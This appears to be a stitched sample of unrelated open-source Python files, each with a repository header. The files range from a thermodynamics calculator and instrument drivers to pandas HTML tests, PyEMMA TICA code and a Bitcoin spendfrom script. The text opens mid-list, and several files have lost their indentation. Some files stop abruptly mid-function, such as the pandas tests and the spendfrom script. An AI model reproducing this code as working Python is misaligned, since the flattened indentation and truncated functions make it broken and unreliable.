"SI44", "P", "P24", "P25", "P26", "P27", "P28", "P29", "P30", "P31", "P32",
"P33", "P34", "P35", "P36", "P37", "P38", "P39", "P40", "P41", "P42", "P43",
"P44", "P45", "P46", "S", "S26", "S27", "S28", "S29", "S30", "S31", "S32", "S33",
"S34", "S35", "S36", "S37", "S38", "S39", "S40", "S41", "S42", "S43", "S44",
"S45", "S46", "S47", "S48", "S49", "CL", "CL28", "CL29", "CL30", "CL31", "CL32",
"CL33", "CL34", "CL35", "CL36", "CL37", "CL38", "CL39", "CL40", "CL41", "CL42",
"CL43", "CL44", "CL45", "CL46", "CL47", "CL48", "CL49", "CL50", "CL51", "AR",
"AR30", "AR31", "AR32", "AR33", "AR34", "AR35", "AR36", "AR37", "AR38", "AR39",
"AR40", "AR41", "AR42", "AR43", "AR44", "AR45", "AR46", "AR47", "AR48", "AR49",
"AR50", "AR51", "AR52", "AR53", "K", "K32", "K33", "K34", "K35", "K36", "K37",
"K38", "K39", "K40", "K41", "K42", "K43", "K44", "K45", "K46", "K47", "K48",
"K49", "K50", "K51", "K52", "K53", "K54", "K55", "CA", "CA34", "CA35", "CA36",
"CA37", "CA38", "CA39", "CA40", "CA41", "CA42", "CA43", "CA44", "CA45", "CA46",
"CA47", "CA48", "CA49", "CA50", "CA51", "CA52", "CA53", "CA54", "CA55", "CA56",
"CA57", "SC", "SC36", "SC37", "SC38", "SC39", "SC40", "SC41", "SC42", "SC43",
"SC44", "SC45", "SC46", "SC47", "SC48", "SC49", "SC50", "SC51", "SC52", "SC53",
"SC54", "SC55", "SC56", "SC57", "SC58", "SC59", "SC60", "TI", "TI38", "TI39",
"TI40", "TI41", "TI42", "TI43", "TI44", "TI45", "TI46", "TI47", "TI48", "TI49",
"TI50", "TI51", "TI52", "TI53",
KatjaT/Thermodynamics | katja_thermo.py | Python | mit | 3,325 | 0.010827
# -*- coding: utf-8 -*-
"""
calculate thermodynamics for Katja
"""
from component_contribution.kegg_reaction import KeggReaction
from component_contribution.kegg_model import KeggModel
from component_contribution.component_contribution import ComponentContribution
from component_contribution.thermodynamic_constants import R, default_T
import csv
import numpy as np
import uncertainties.unumpy as unumpy
def reaction2dG0(reaction_list):
'''
    Calculates the dG0 of a list of reactions.
Uses the component-contribution package (Noor et al) to estimate
the standard Gibbs Free Energy of reactions based on
component contribution approach and measured values (NIST and Alberty)
Arguments:
List of reaction strings
Returns:
Array of dG0 values and standard deviation of estimates
'''
cc = ComponentContribution.init()
Kmodel = KeggModel.from_formulas(reaction_list)
Kmodel.add_thermo(cc)
dG0_prime, dG0_std = Kmodel.get_transformed_dG0(pH=7.5, I=0.2, T=298.15)
dG0_prime = np.array(map(lambda x: x[0,0], dG0_prime))
dG0_prime = unumpy.uarray(dG0_prime, np.diag(dG0_std))
return dG0_prime
def reaction2Keq(reaction_list):
'''
Calculates the equilibrium constants of a reaction, using dG0.
Arguments:
List of cobra model reaction objects
Returns:
Array of K-equilibrium values
'''
dG0_prime = reaction2dG0(reaction_list)
Keq = unumpy.exp( -dG0_prime / (R*default_T) )
return Keq
def reaction2RI(reaction_list, fixed_conc=0.1):
'''
Calculates the reversibility index (RI) of a reaction.
The RI represent the change in concentrations of metabolites
(from equal reaction reactants) that will make the reaction reversible.
That is, the higher RI is, the more irreversible the reaction.
A convenient threshold for reversibility is RI>=1000, that is a change of
1000% in metabolite concentrations is required in order to flip the
reaction direction.
Arguments:
List of cobra model reaction objects
Returns:
Array of RI values
'''
keq = reaction2Keq(reaction_list)
sparse = map(lambda x: KeggReaction.parse_formula(x).sparse, reaction_list)
N_P = np.zeros(len(sparse))
N_S = np.zeros(len(sparse))
for i,s in enumerate(sparse):
N_P[i] = sum([v for v in s.itervalues() if v>0])
N_S[i] = -sum([v for v in s.itervalues() if v<0])
N = N_P + N_S
Q_2prime = fixed_conc**(N_P-N_S)
RI = ( keq*Q_2prime )**( 2.0/N )
return RI
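# Worked sketch (reaction string is illustrative, written with KEGG compound IDs):
#     rxns = ['C00002 + C00001 <=> C00008 + C00009']   # ATP + H2O <=> ADP + Pi
#     print(reaction2RI(rxns))
# an RI well above the 1000 threshold mentioned in the docstring would mark the
# hydrolysis as effectively irreversible.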
if __name__ == "__main__":
reactions = csv.reader(open('CCMtbRxnsKEGG.txt', 'r'))
names = []
reaction_list = []
for row in reactions:
row = row[0].split(" ")
names.append(row[0].replace("'", ''))
reaction_list.append(row[1])
dG0 = reaction2dG0(reaction_list)
Keq = reaction2Keq(reaction_list)
RI = reaction2RI(reaction_list)
reversibility_index = dict(zip(names, RI))
f = open('reversibility_index.csv','w')
w = csv.writer(f)
for k,v in reversibility_index.iteritems():
w.writerow([k, v])
f.close()
alexforencich/python-ivi | ivi/agilent/agilentMSOX92804A.py | Python | mit | 1,692 | 0.004728
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentMSOX92804A(agilent90000):
"Agilent Infiniium MSOX92804A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'MSOX92804A')
super(agilentMSOX92804A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 28e9
self._init_channels()
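# Usage sketch (resource string is illustrative): the driver is normally instantiated
# through python-ivi with a VISA resource identifier, e.g.
#     import ivi
#     scope = ivi.agilent.agilentMSOX92804A("TCPIP0::192.0.2.10::INSTR")
#     scope.channels[0].enabled = True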
fyabc/MiniGames | HearthStone2/MyHearthStone/ai/standard.py | Python | mit | 265 | 0
#! /usr/bin/python
# -*- coding: utf-8 -*-
from . import agent
# Import them to register agents.
from .rule_based import basic
__author__ = 'fyabc'
def get_agent_by_name(name):
return agent.Agent.AgentClasses[name]
__all__ = [
'get_agent_by_name',
]
AugurProject/augur-core | tests/libraries/test_reentrancy_guard.py | Python | gpl-3.0 | 855 | 0.005848
#!/usr/bin/env python
from ethereum.tools import tester
from ethereum.tools.tester import TransactionFailed
from pytest import fixture, mark, raises
@fixture(scope='session')
def testerSnapshot(sessionFixture):
sessionFixture.uploadAndAddToController('solidity_test_helpers/ReentrancyGuardHelper.sol')
ReentrancyGuardHelper = sessionFixture.contracts['ReentrancyGuardHelper']
return sessionFixture.createSnapshot()
@fixture
def testerContractsFixture(sessionFixture, testerSnapshot):
sessionFixture.resetToSnapshot(testerSnapshot)
return sessionFixture
def test_nonReentrant(testerContractsFixture):
ReentrancyGuardHelper = testerContractsFixture.contracts['ReentrancyGuardHelper']
    assert ReentrancyGuardHelper.testerCanReentrant()
with raises(TransactionFailed):
ReentrancyGuardHelper.testerCanNotReentrant()
phobson/bokeh | bokeh/command/__init__.py | Python | bsd-3-clause | 340 | 0.005882
''' Provides a command line application for Bokeh.
The following subcommands are available:
'''
from __future__ import absolute_import
def _build_docstring():
global __doc__
from . import subcommands
for cls in subcommands.all:
__doc__ += "%8s : %s\n" % (cls.name, cls.help)
_build_docstring()
del _build_docstring
CartoDB/bigmetadata | tests/us/census/test_lodes.py | Python | bsd-3-clause | 423 | 0.004728
'''
Test ACS columns
'''
from tasks.util import shell
# TODO clean this up in a more general init script
try:
shell('createdb test')
except:
pass
from nose.tools import with_setup
from tasks.us.census.lodes import WorkplaceAreaCharacteristicsColumns
from tests.util import runtask, setup, teardown
@with_setup(setup, teardown)
def test_wac_columns_run():
runtask(WorkplaceAreaCharacteristicsColumns())
datapythonista/pandas | pandas/tests/io/test_html.py | Python | bsd-3-clause | 40,117 | 0.000773
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
        msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url_positional_match(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
with tm.assert_produces_warning(FutureWarning):
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@pytest.mark.xfail(reason="Html file was removed")
@tm.network
def test_banklist_url(self):
url = "https://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows
CiscoSystems/nova-solver-scheduler | nova/scheduler/solvers/constraints/num_instances_constraint.py | Python | apache-2.0 | 2,244 | 0.001337
# Copyright (c) 2014 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.scheduler.solvers import constraints
CONF = cfg.CONF
CONF.import_opt("max_instances_per_host",
"nova.scheduler.filters.num_instances_filter")
LOG = logging.getLogger(__name__)
class NumInstancesConstraint(constraints.BaseLinearConstraint):
"""Constraint that specifies the maximum number of instances that
each host can launch.
"""
    def _generate_components(self, variables, hosts, filter_properties):
num_hosts = len(hosts)
num_instances = filter_properties.get('num_instances')
var_matrix = variables.host_instance_matrix
max_instances = CONF.max_instances_per_host
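        # For each host, any requested instance slot beyond its remaining capacity
        # (max_instances_per_host minus instances already running) is forced to 0
        # through an equality constraint on the corresponding matrix variable.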
for i in xrange(num_hosts):
num_host_instances = hosts[i].num_instances
acceptable_num_instances = int(max_instances - num_host_instances)
if acceptable_num_instances < 0:
acceptable_num_instances = 0
if acceptable_num_instances < num_instances:
for j in xrange(acceptable_num_instances, num_instances):
self.variables.append([var_matrix[i][j]])
self.coefficients.append([1])
self.constants.append(0)
self.operators.append('==')
LOG.debug(_("%(host)s can accept %(num)s requested instances "
"according to NumInstancesConstraint."),
{'host': hosts[i],
'num': acceptable_num_instances})
justasabc/kubernetes-ubuntu | ke/images/python/backup/backup_cluster.py | Python | apache-2.0 | 4,855 | 0.036663
class Cluster:
"""
a cluster has N simulators
"""
def __init__(self,region_pool):
self.region_pool = region_pool
self.filepath = CLUSTER_DATA_DIR+"cluster"
# simulator list
self.simulator_list = []
def get_simulator_list(self):
return self.simulator_list
def get_simulator_count(self):
return len(self.simulator_list)
def add_simulator(self,sim):
self.simulator_list.append(sim)
def remove_simulator(self,sim):
self.simulator_list.remove(sim)
#====================================================================================
# get region name list
#====================================================================================
def __get_region_name_list(self,region_group,global_region_data):
#REGION_NAME_HUYU=["huyu"+str(x)+str(y) for x in range(4) for y in range(7)]
wh = global_region_data[region_group]["wh"]
xmax = wh[0]
ymax = wh[1]
region_name_list = ["{0}{1}{2}".format(region_group,x,y) for x in range(xmax) for y in range(ymax)]
return region_name_list
#====================================================================================
# init cluster
#====================================================================================
def init_cluster(self):
if os.path.exists(self.filepath):
print "[Cluster] read cluster data from {0}...".format(self.filepath)
self.__read_cluster_data(self.filepath)
else:
print "[Cluster] create default cluster for the first time..."
self.__create_default_cluster()
print "[Cluster] save cluster data to {0}...".format(self.filepath)
self.__save_cluster_data(self.filepath)
def __new_simulator_name(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return "default"
return "sim{0}".format(sim_count+1)
def __new_simulator_port(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return SIM_START_PORT
return SIM_START_PORT+(sim_count+1)
    #====================================================================================
# create default cluster
#====================================================================================
def __create_default_cluster(self):
self.simulator_list = []
region_pool = self.region_pool
global_region_data = self.region_pool.get_global_region_data()
# huyu
region_group="huyu"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
huyu_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
huyu_sim.create_simulator_xml_file()
self.add_simulator(huyu_sim)
# xwd
region_group="xwd"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
xwd_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
xwd_sim.create_simulator_xml_file()
self.add_simulator(xwd_sim)
# newregion
region_group="newregion"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
#region_name_list = self.__get_region_name_list("newregion",global_region_data)
region_name_list = self.__get_region_name_list(region_group,global_region_data)
#region_name_list = ["newregion00","newregion01"]
new_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
new_sim.create_simulator_xml_file()
self.add_simulator(new_sim)
print huyu_sim.get_region_port_list()
print xwd_sim.get_region_port_list()
print new_sim.get_region_port_list()
# copy xml files to minions
cmd = UtilityCommander()
cmd.copy_region_xml_to_minions(MINIONS)
def __save_cluster_data(self,filepath):
with open(filepath,'w') as f:
for sim in self.simulator_list:
line = sim.str()+"\n"
f.write(line)
def __read_cluster_data(self,filepath):
for line in open(filepath,'r'):
sim = self.__read_simulator(line)
self.add_simulator(sim)
#====================================================================================
# read simulator from simulator string
#====================================================================================
def __read_simulator(self,simulator_str):
parts = simulator_str.rstrip("\n").split(",")
sim_name = parts[0]
sim_port = int(parts[1])
region_name_list = parts[2:]
# create simulator
sim = Simulator(sim_name,sim_port,self.region_pool,region_name_list)
return sim
def start(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
#sim_pod.start()
def stop(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
sim_pod.stop()
Geoportail-Luxembourg/qgis-pag-plugin | widgets/stylize/stylize.py | Python | mit | 2,046 | 0.012219
'''
Created on 22 sept. 2015
@author: arxit
'''
import os
from qgis.core import *
from PyQt4.QtCore import QCoreApplication
import PagLuxembourg.main
class StylizeProject(object):
'''
Main class for the layers stylize widget
'''
def __init__(self):
'''
Constructor
'''
pass
def run(self):
'''
Runs the widget
'''
project = PagLuxembourg.main.current_project
if not project.isPagProject():
return
# Map layers in the TOC
        maplayers = QgsMapLayerRegistry.instance().mapLayers()
# Iterates through XSD types
for type in PagLuxembourg.main.xsd_schema.types:
if type.geometry_type is None:
continue
uri = project.getTypeUri(type)
found = False
# Check whether a layer with type data source exists in the map
for k,v in maplayers.iteritems():
            if project.compareURIs(v.source(), uri):
found = True
layer = v
break
if not found:
continue
self.stylizeLayer(layer, type)
PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('StylizeProject','Success'),
QCoreApplication.translate('StylizeProject','The layers styling is finished.'))
def stylizeLayer(self, layer, type):
'''
Stylize the current layer
:param layer: The layer to update
:type layer: QgsVectorLayer
:param type: XSD schema type
:type type: PAGType
'''
qml = os.path.join(PagLuxembourg.main.plugin_dir,
'styles',
'{}.qml'.format(type.name))
layer.loadNamedStyle(qml)
markovmodel/PyEMMA | pyemma/coordinates/transform/tica.py | Python | lgpl-3.0 | 11,423 | 0.004465
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 19.01.2015
@author: marscher
'''
import numpy as np
from pyemma._base.serialization.serialization import SerializableMixIn
from pyemma._ext.variational.solvers.direct import eig_corr
from pyemma._ext.variational.util import ZeroRankError
from pyemma.coordinates.estimation.covariance import LaggedCovariance
from pyemma.coordinates.transform._tica_base import TICABase, TICAModelBase
from pyemma.util.annotators import fix_docs
import warnings
__all__ = ['TICA']
@fix_docs
class TICA(TICABase, SerializableMixIn):
r""" Time-lagged independent component analysis (TICA)"""
__serialize_version = 0
def __init__(self, lag, dim=-1, var_cutoff=0.95, kinetic_map=True, commute_map=False, epsilon=1e-6,
stride=1, skip=0, reversible=True, weights=None, ncov_max=float('inf')):
r""" Time-lagged independent component analysis (TICA) [1]_, [2]_, [3]_.
Parameters
----------
lag : int
lag time
dim : int, optional, default -1
Maximum number of significant independent components to use to reduce dimension of input data. -1 means
all numerically available dimensions (see epsilon) will be used unless reduced by var_cutoff.
Setting dim to a positive value is exclusive with var_cutoff.
var_cutoff : float in the range [0,1], optional, default 0.95
Determines the number of output dimensions by including dimensions until their cumulative kinetic variance
exceeds the fraction subspace_variance. var_cutoff=1.0 means all numerically available dimensions
(see epsilon) will be used, unless set by dim. Setting var_cutoff smaller than 1.0 is exclusive with dim
kinetic_map : bool, optional, default True
Eigenvectors will be scaled by eigenvalues. As a result, Euclidean distances in the transformed data
approximate kinetic distances [4]_. This is a good choice when the data is further processed by clustering.
commute_map : bool, optional, default False
Eigenvector_i will be scaled by sqrt(timescale_i / 2). As a result, Euclidean distances in the transformed
data will approximate commute distances [5]_.
epsilon : float
eigenvalue norm cutoff. Eigenvalues of C0 with norms <= epsilon will be
cut off. The remaining number of eigenvalues define the size
of the output.
stride: int, optional, default = 1
Use only every stride-th time step. By default, every time step is used.
skip : int, default=0
skip the first initial n frames per trajectory.
reversible: bool, default=True
symmetrize correlation matrices C_0, C_{\tau}.
weights: object or list of ndarrays, optional, default = None
* An object that allows to compute re-weighting factors to estimate equilibrium means and correlations from
off-equilibrium data. The only requirement is that weights possesses a method weights(X), that accepts a
trajectory X (np.ndarray(T, n)) and returns a vector of re-weighting factors (np.ndarray(T,)).
* A list of ndarrays (ndim=1) specifies the weights for each frame of each trajectory.
Notes
-----
Given a sequence of multivariate data :math:`X_t`, computes the mean-free
covariance and time-lagged covariance matrix:
.. math::
C_0 &= (X_t - \mu)^T (X_t - \mu) \\
C_{\tau} &= (X_t - \mu)^T (X_{t + \tau} - \mu)
and solves the eigenvalue problem
.. math:: C_{\tau} r_i = C_0 \lambda_i(tau) r_i,
where :math:`r_i` are the independent components and :math:`\lambda_i(tau)` are
their respective normalized time-autocorrelations. The eigenvalues are
related to the relaxation timescale by
.. math:: t_i(tau) = -\tau / \ln |\lambda_i|.
When used as a dimension reduction method, the input data is projected
onto the dominant independent components.
References
----------
.. [1] Perez-Hernandez G, F Paul, T Giorgino, G De Fabritiis and F Noe. 2013.
Identification of slow molecular order parameters for Markov model construction
J. Chem. Phys. 139, 015102. doi:10.1063/1.4811489
.. [2] Schwantes C, V S Pande. 2013.
Improvements in Markov State Model Construction Reveal Many Non-Native Interactions in the Folding of NTL9
J. Chem. Theory. Comput. 9, 2000-2009. doi:10.1021/ct300878a
.. [3] L. Molgedey and H. G. Schuster. 1994.
Separation of a mixture of independent signals using time delayed correlations
Phys. Rev. Lett. 72, 3634.
.. [4] Noe, F. and Clementi, C. 2015. Kinetic distance and kinetic maps from molecular dynamics simulation.
J. Chem. Theory. Comput. doi:10.1021/acs.jctc.5b00553
.. [5] Noe, F., Banisch, R., Clementi, C. 2016. Commute maps: separating slowly-mixing molecular configurations
for kinetic modeling. J. Chem. Theory. Comput. doi:10.1021/acs.jctc.6b00762
"""
super(TICA, self).__init__()
if kinetic_map and commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if (kinetic_map or commute_map) and not reversible:
kinetic_map = False
commute_map = False
warnings.warn("Cannot use kinetic_map or commute_map for non-reversible processes, both will be set to"
"False.")
# this instance will be set by partial fit.
self._covar = None
self.dim = dim
self.var_cutoff = var_cutoff
self.set_params(lag=lag, dim=dim, var_cutoff=var_cutoff, kinetic_map=kinetic_map, commute_map=commute_map,
epsilon=epsilon, reversible=reversible, stride=stride, skip=skip, weights=weights, ncov_max=ncov_max)
@property
def model(self):
if not hasattr(self, '_model') or self._model is None:
self._model = TICAModelBase()
return self._model
def describe(self):
try:
dim = self.dimension()
except RuntimeError:
dim = self.dim
return "[TICA, lag = %i; max. output dim. = %i]" % (self._lag, dim)
def estimate(self, X, **kwargs):
r"""
Chunk-based parameterization of TICA. Iterates over all data and estimates
the mean, covariance and time lagged covariance. Finally, the
generalized eigenvalue problem is solved to determine
the independent components.
"""
return super(TICA, self).estimate(X, **kwargs)
def partial_fit(self, X):
""" incrementally update the covariances and mean.
Parameters
----------
X: array, list of arrays, PyEMMA reader
input data.
Notes
-----
The projection matrix is first being calculated upon its first access.
"""
from pyemma.coordinates import source
iterable = source(X, chunksize=self.chunksize)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
DavidSantamaria/Om | contrib/spendfrom/spendfrom.py | Python | mit | 10,053 | 0.005968
#!/usr/bin/env python
#
# Use the raw transactions API to spend bitcoins received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a bitcoind or Bitcoin-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the bitcoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Bitcoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Bitcoin")
return os.path.expanduser("~/.bitcoin")
def read_bitcoin_config(dbdir):
"""Read the bitcoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "bitcoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a bitcoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19230 if testnet else 9230
connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
